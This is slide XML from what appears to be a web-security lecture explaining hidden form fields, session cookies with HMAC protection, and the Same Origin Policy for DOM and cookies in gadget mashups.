              <a:rPr lang="en-US">
                <a:latin typeface="CourierNewPSMT"/>
              </a:rPr>
              <a:t>&lt;INPUT TYPE=HIDDEN NAME=name VALUE="Black leather purse"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="CourierNewPS-BoldMT"/>
              </a:rPr>
              <a:t>&lt;INPUT TYPE=HIDDEN NAME=price VALUE="20.00"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="CourierNewPSMT"/>
              </a:rPr>
              <a:t>&lt;INPUT TYPE=HIDDEN NAME=sh VALUE="1"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="CourierNewPSMT"/>
              </a:rPr>
              <a:t>&lt;INPUT TYPE=HIDDEN NAME=img VALUE="purse.jpg"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="CourierNewPSMT"/>
              </a:rPr>
              <a:t>&lt;INPUT TYPE=HIDDEN NAME=custom1 VALUE="Black leather purse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="CourierNewPSMT"/>
              </a:rPr>
              <a:t>with leather straps"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="CourierNewPSMT"/>
              </a:rPr>
              <a:t>&lt;INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="CourierNewPSMT"/>
              </a:rPr>
              <a:t>&lt;/FORM&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38916" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="682625" y="1635126"/>
            <a:ext cx="6192838" cy="646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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why not to store sensitive information on the client side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Integrity violation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="ArialMT"/>
              </a:rPr>
              <a:t>Dansie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="ArialMT"/>
              </a:rPr>
              <a:t> Shopping Cart (2006)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1600200" y="144463"/>
            <a:ext cx="8382000" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0"/>
              <a:t>HTTP : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0" smtClean="0"/>
              <a:t>Session in COOKIES</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45060" name="Picture 17" descr="browse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063" y="3506788"/>
            <a:ext cx="684212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1" name="Picture 12" descr="C:\Users\Zhengqin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YD0QL92J\MC900434845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5963" y="3219450"/>
            <a:ext cx="811212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2554289" y="3003550"/>
            <a:ext cx="3097213" cy="369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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>POST login.cgi (usr+pwd)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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 flipH="1">
            <a:off x="1762125" y="4083050"/>
            <a:ext cx="381793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698750" y="4117976"/>
            <a:ext cx="5073650" cy="1477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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTTP Header:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Set-cookie: NAME=VALUE ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>domain = (who can read the cookie) ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>expires = (when) ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 25" descr="browse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8527" y="6386513"/>
            <a:ext cx="682625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12" descr="C:\Users\Zhengqin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YD0QL92J\MC900434845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8363" y="6137275"/>
            <a:ext cx="811212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051050" y="6172201"/>
            <a:ext cx="5073650" cy="646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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>GET securepage.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cookie: NAME=VALUE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1835151" y="6819900"/>
            <a:ext cx="37449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7" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1690690" y="3578225"/>
            <a:ext cx="38893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" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="682749" y="1562671"/>
            <a:ext cx="4786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/>
              <a:t>HTTP does not have state, cookies add state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6805" y="626567"/>
            <a:ext cx="3929062" cy="646113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91432" tIns="45716" rIns="91432" bIns="45716">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3500" b="1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HTTP : COOKIES</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"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2991" y="2138364"/>
            <a:ext cx="6569075" cy="3913930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91432" tIns="45716" rIns="91432" bIns="45716">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="379381" indent="-379381" defTabSz="1014327" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>set-cookie(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>amount”,$amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379381" indent="-379381" defTabSz="1014327" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="379381" indent="-379381" defTabSz="1014327" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Content-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>type:text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379381" indent="-379381" defTabSz="1014327" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Cookie: Amount = 20$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379381" indent="-379381" defTabSz="1014327" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="379381" indent="-379381" defTabSz="1014327" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>To make it secure it is necessary to add a “MAC” (message-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>authenticatedcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>) to the amount:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379381" indent="-379381" defTabSz="1014327" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Cookie: Amount = 20$; HMAC(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ServerKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, 20)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SECURITY BASIS: SOP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841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ounded Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="845873" y="4736621"/>
            <a:ext cx="8120380" cy="1096310"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="39999"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="101370" tIns="50685" rIns="101370" bIns="50685"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4099" name="Rounded Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="761286" y="2628333"/>
            <a:ext cx="8120380" cy="1096310"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="39999"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="101370" tIns="50685" rIns="101370" bIns="50685"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410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origin policy:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0" smtClean="0"/>
              <a:t>“high level”</a:t>
            </a:r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761285" y="2023957"/>
            <a:ext cx="8881666" cy="5144224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Same Origin Policy (SOP) for DOM:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="577248" lvl="1" indent="-258706">
              <a:lnSpc>
                <a:spcPts val="3769"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1330"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Origin A can access origin B’s DOM if match on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sz="2900" b="1" dirty="0" smtClean="0"/>
              <a:t>(scheme,   domain,  port)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="258706" indent="-258706">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Same Original Policy (SOP) for cookies: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="577248" lvl="1" indent="-318543">
              <a:lnSpc>
                <a:spcPts val="3769"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1330"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Generally speaking, based on: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sz="2900" b="1" dirty="0" smtClean="0"/>
              <a:t>([scheme],  domain,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty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453031" y="5664270"/>
            <a:ext cx="1189505" cy="924661"/>
            <a:chOff x="2209800" y="4984376"/>
            <a:chExt cx="1071282" cy="835904"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4104" name="TextBox 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="5486400"/>
              <a:ext cx="893928" cy="3338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optional</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4105" name="Freeform 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2761129" y="4984376"/>
              <a:ext cx="519953" cy="573742"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 519953"/>
                <a:gd name="T1" fmla="*/ 573742 h 573742"/>
                <a:gd name="T2" fmla="*/ 394447 w 519953"/>
                <a:gd name="T3" fmla="*/ 340659 h 573742"/>
                <a:gd name="T4" fmla="*/ 519953 w 519953"/>
                <a:gd name="T5" fmla="*/ 0 h 573742"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 519953"/>
                <a:gd name="T10" fmla="*/ 0 h 573742"/>
                <a:gd name="T11" fmla="*/ 519953 w 519953"/>
                <a:gd name="T12" fmla="*/ 573742 h 5737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9953" h="573742">
                  <a:moveTo>
                    <a:pt x="0" y="573742"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="153894" y="505012"/>
                    <a:pt x="307788" y="436283"/>
                    <a:pt x="394447" y="340659"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="481106" y="245035"/>
                    <a:pt x="500529" y="122517"/>
                    <a:pt x="519953" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="38100" algn="ctr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103" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4144777" y="6915186"/>
            <a:ext cx="6005698" cy="674652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lIns="101370" tIns="50685" rIns="101370" bIns="50685" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>scheme://domain:port/path?params</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867325" y="3146847"/>
            <a:ext cx="727803" cy="665868"/>
            <a:chOff x="5608626" y="1600199"/>
            <a:chExt cx="655015" cy="602082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="11" name="Straight Connector 25"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5608626" y="1600200"/>
              <a:ext cx="655014" cy="602081"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="127000" cap="rnd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2" name="Straight Connector 26"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="5608628" y="1600199"/>
              <a:ext cx="655013" cy="602081"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="127000" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 130" descr="ie-6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3469" y="3722911"/>
            <a:ext cx="592111" cy="590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99856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1402829" y="0"/>
            <a:ext cx="9134475" cy="1265237"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Same Origin Policy for  DOM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4638675"/>
            <a:ext cx="4484688" cy="2782888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Full sharing (JS Env.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>Running as integrator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Gadget trusted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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6513" y="4638675"/>
            <a:ext cx="4486275" cy="2836863"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Full isolation (by SOP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>Running as gadget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>Limited sharing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>Frame identifier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>PostMessage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1268413" y="1470025"/>
            <a:ext cx="2876550" cy="385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70" tIns="50685" rIns="101370" bIns="50685" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using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&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tag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837238" y="1446213"/>
            <a:ext cx="3044825" cy="385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70" tIns="50685" rIns="101370" bIns="50685" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using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/>
              <a:t>frame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162050" y="1876425"/>
            <a:ext cx="3140075" cy="2574925"/>
            <a:chOff x="4255334" y="2636912"/>
            <a:chExt cx="4822117" cy="3917871"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4200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20104" y="2636912"/>
              <a:ext cx="3870770" cy="3024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Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4759975" y="2924352"/>
              <a:ext cx="3771392" cy="2664248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5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GB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5657113" y="5588600"/>
              <a:ext cx="143834" cy="359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6593257" y="3284254"/>
              <a:ext cx="1799152" cy="223188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GB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492832" y="5516137"/>
              <a:ext cx="160900" cy="4323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007" name="TextBox 16"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4255334" y="5805265"/>
              <a:ext cx="2723349" cy="4450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300"/>
                <a:t>Google Maps Gadget</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42008" name="TextBox 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7240384" y="5805265"/>
              <a:ext cx="1837067" cy="749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300"/>
                <a:t>Integrator’s</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="en-GB" sz="1300"/>
                <a:t>Housing Data</a:t>
              </a:r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5883275" y="1939925"/>
            <a:ext cx="3113088" cy="2487613"/>
            <a:chOff x="4941408" y="2564904"/>
            <a:chExt cx="4318980" cy="3950034"/>
          </a:xfrm>
